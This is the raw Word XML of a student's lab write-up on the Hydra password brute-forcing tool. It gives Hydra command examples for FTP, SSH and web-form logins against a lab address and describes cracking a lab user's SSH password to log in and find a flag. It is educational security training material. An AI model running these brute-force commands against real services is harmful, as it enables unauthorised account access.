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11DE702" w:rsidR="001E67DF" w:rsidRDefault="00CE2EEB">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Hydra</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7D427EF3" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="30" w:space="0" w:color="3498DB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:after="137"/>
        <w:ind w:left="295"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="00CE2EEB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="00D10606">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/05/2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC84901" w14:textId="4056093D" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="30" w:space="0" w:color="3498DB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:after="137"/>
        <w:ind w:left="295"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty: </w:t>
      </w:r>
      <w:r w:rsidR="00CE2EEB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A58055" w14:textId="43A2BF43" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="30" w:space="0" w:color="3498DB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
        <w:spacing w:after="137"/>
        <w:ind w:left="295"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Category: </w:t>
      </w:r>
      <w:r w:rsidR="00CE2EEB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Offensive Security</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65E3D35" w:rsidR="004F1182" w:rsidRPr="004F1182" w:rsidRDefault="004F1182" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">This lab </w:t>
      </w:r>
      <w:r w:rsidR="00726C00">
        <w:t xml:space="preserve">is an introduction to the brute force attack tool, Hydra. It includes details about the tool and how the commands are used as well as a practical example of using it to crack a user’s SSH password and use it to log in as them and find the flag. </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FCB7960" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>2. Toolset Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC4006" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="308" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="-60" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24F44C4B" wp14:editId="4B1F8DD8">
                <wp:extent cx="6120000" cy="9525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1637" name="Group 1637"/>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2" name="Shape 1872"/>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7" style="width:481.89pt;height:0.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="61200,95">
                <v:shape id="Shape 1873" style="position:absolute;width:61200;height:95;left:0;top:0;" coordsize="6120000,9525" path="m0,0l6120000,0l6120000,9525l0,9525l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#eeeeee"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9623" w:type="dxa"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="158" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2398"/>
        <w:gridCol w:w="7225"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E67DF" w14:paraId="5CB602E7"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7311274" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7225" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3498DB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="209DB1AD" w14:textId="77777777" w:rsidR="001E67DF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Purpose / Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E67DF" w14:paraId="7C66F09D" w14:textId="77777777" w:rsidTr="000D1B55">
        <w:trPr>
          <w:trHeight w:val="699"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2398" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D9A3594" w14:textId="0B3458EC" w:rsidR="001E67DF" w:rsidRDefault="00CE2EEB">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7225" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30064A8E" w14:textId="76FF2CC9" w:rsidR="001E67DF" w:rsidRDefault="00CE2EEB">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>A brute force online password cracking program</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E6B5F57" w14:textId="77777777" w:rsidR="000D1B55" w:rsidRDefault="000D1B55">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1D4D0F" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="00CE2EEB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038BEDE7" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRPr="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="00F96E69"/>
    <w:p w14:paraId="22431951" w14:textId="342FFA0A" w:rsidR="001E67DF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="000D1B55">
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidR="004F1182">
        <w:t>I did</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD6C678" w14:textId="77777777" w:rsidR="004F1182" w:rsidRDefault="004F1182" w:rsidP="004F1182"/>
    <w:p w14:paraId="2D48B053" w14:textId="49F37F70" w:rsidR="002E668C" w:rsidRDefault="00BE7F05" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra is a brute forcing tool used to run through a list and brute force authentication services. It speeds up the process of manually guessing passwords as it uses a password list and tries each password in that list against the target. It has the ability to brute force protocols such as SSH, FTP, MYSQL, SMTP, HTTPS and many more. This highlights the importance of using a strong password as if it appears in these common password lists then it is prone to being guessed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150EE83" w14:textId="77777777" w:rsidR="004E2E06" w:rsidRDefault="004E2E06" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F29C47" w14:textId="77777777" w:rsidR="004E2E06" w:rsidRDefault="004E2E06" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6495CF" w14:textId="77777777" w:rsidR="004E2E06" w:rsidRDefault="004E2E06" w:rsidP="00A80858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B10CB7" w14:textId="13569EFE" w:rsidR="002E668C" w:rsidRDefault="002E668C" w:rsidP="004F1182"/>
    <w:p w14:paraId="4BA43FAF" w14:textId="48CD22E2" w:rsidR="002E668C" w:rsidRDefault="00580376" w:rsidP="004F1182">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Practical: Using Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AE151" w14:textId="77777777" w:rsidR="00580376" w:rsidRPr="00580376" w:rsidRDefault="00580376" w:rsidP="004F1182">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="667F7990" w14:textId="06025C20" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="004F1182">
      <w:r>
        <w:t>The command we use with Hydra depends on the protocol/service we are attacking. See examples below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23739177" w14:textId="77777777" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="004F1182"/>
    <w:p w14:paraId="5FD8DF14" w14:textId="093C740A" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:r>
        <w:t>FTP with username = user and password list = passlist.txt you would use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B64C221" w14:textId="6395E64E" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra -l user -P passlist.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00A223CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ftp://10.80.133.76</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="079C7E3A" w14:textId="230CAEA0" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376"/>
    <w:p w14:paraId="1DFF4C11" w14:textId="2BBC1826" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:r>
        <w:t>SSH with username = root and password list = passwords.txt you would use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD2D897" w14:textId="5A80F0E5" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hydra -l root -P passwords.txt 10.80.133.76 -t 4 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB736D0" w14:textId="77777777" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3CC597" w14:textId="123582B3" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Web Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A61F0" w14:textId="5D54D16A" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hydra -l &lt;username&gt; -P &lt;wordlist&gt; 10.80.133.76 http-post-form “&lt;path&gt;: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;: &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>invalid_response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10290C8C" w14:textId="65DAFF7C" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00580376">
        <w:t>hydra -l &lt;username&gt; -P &lt;wordlist&gt; 10.80.133.76 http-post-form "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00580376">
        <w:t>/:username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00580376">
        <w:t>=^USER^&amp;password=^PASS</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00580376">
        <w:t>^:F</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00580376">
        <w:t>=incorrect" -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357D977B" w14:textId="77777777" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376"/>
    <w:p w14:paraId="3994ECF3" w14:textId="059E4968" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376">
      <w:r>
        <w:t xml:space="preserve">if the web server is listening on a non-default port, you can specify the port number </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>using -s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D22F74" w14:textId="77777777" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="00580376"/>
    <w:p w14:paraId="5B06F6C9" w14:textId="2509E1FC" w:rsidR="00C41B2C" w:rsidRDefault="00C41B2C" w:rsidP="00F77DB6">
      <w:r>
        <w:t>To show this practically, I used Hydra to find the SSH password for user molly using the rockyou.txt password list. This returned her password as butterfly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49618FCD" w14:textId="77777777" w:rsidR="00C41B2C" w:rsidRDefault="00C41B2C" w:rsidP="00580376"/>
    <w:p w14:paraId="44EDB4F2" w14:textId="49A5EEC5" w:rsidR="00C41B2C" w:rsidRDefault="00C41B2C" w:rsidP="00580376">
      <w:r w:rsidRPr="00C41B2C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DC5E3A3" wp14:editId="46D08E82">
            <wp:extent cx="6082030" cy="880110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40794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42765" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6082030" cy="880110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7673DA" w14:textId="77777777" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="004F1182"/>
    <w:p w14:paraId="098B3D01" w14:textId="45E0A7C8" w:rsidR="00580376" w:rsidRDefault="00C41B2C" w:rsidP="004F1182">
      <w:r>
        <w:t xml:space="preserve">I used this password to log in as molly on SSH and access the flag </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F806BF" w14:textId="4A53A36D" w:rsidR="00C41B2C" w:rsidRDefault="00C41B2C" w:rsidP="004F1182">
      <w:r w:rsidRPr="00C41B2C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05B156DB" wp14:editId="7F5DC341">
            <wp:extent cx="3741744" cy="1074513"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199983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32270" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3741744" cy="1074513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7178DF1C" w14:textId="77777777" w:rsidR="00580376" w:rsidRDefault="00580376" w:rsidP="004F1182"/>
    <w:p w14:paraId="70E29DB6" w14:textId="77777777" w:rsidR="00BE7F05" w:rsidRDefault="00BE7F05" w:rsidP="004F1182"/>
    <w:p w14:paraId="6BDAAE58" w14:textId="77777777" w:rsidR="00F96E69" w:rsidRDefault="00F96E69" w:rsidP="004F1182"/>
    <w:p w14:paraId="54F83B9A" w14:textId="6510FDEA" w:rsidR="004F1182" w:rsidRDefault="004F1182" w:rsidP="004F1182">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. What I’ve learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44070D79" w14:textId="77777777" w:rsidR="002E668C" w:rsidRDefault="002E668C" w:rsidP="002E668C"/>
    <w:p w14:paraId="368F94E3" w14:textId="2E237080" w:rsidR="00CE2EEB" w:rsidRDefault="00F77DB6" w:rsidP="00CE2EEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The services/protocols hydra can be used to attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE02DE" w14:textId="7796E8F6" w:rsidR="00F77DB6" w:rsidRDefault="00F77DB6" w:rsidP="00F77DB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Specific hydra commands and parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDEF358" w14:textId="04ADB6BF" w:rsidR="001E67DF" w:rsidRDefault="00F77DB6" w:rsidP="004E2E06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hands-on example of using hydra to get SSH password and login using it</w:t>
      </w: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6547"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40BE3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661E4EBC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3366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3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1402409293">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="832569701">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="284317931">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1229464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518AC"/>
    <w:rsid w:val="001E67DF"/>
    <w:rsid w:val="002E668C"/>
    <w:rsid w:val="00345369"/>
    <w:rsid w:val="004E2E06"/>
    <w:rsid w:val="004F1182"/>
    <w:rsid w:val="00580376"/>
    <w:rsid w:val="00726C00"/>
    <w:rsid w:val="007313D5"/>
    <w:rsid w:val="00A80858"/>
    <w:rsid w:val="00BE7F05"/>
    <w:rsid w:val="00C41B2C"/>
    <w:rsid w:val="00CE2EEB"/>
    <w:rsid w:val="00D10606"/>
    <w:rsid w:val="00D52052"/>
    <w:rsid w:val="00D93C30"/>
    <w:rsid w:val="00F36B4A"/>
    <w:rsid w:val="00F77DB6"/>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E2EEB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00580376"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00580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ftp://10.80.133.7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2</Pages>
  <Words>318</Words>
  <Characters>1813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2026-05-27T13:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>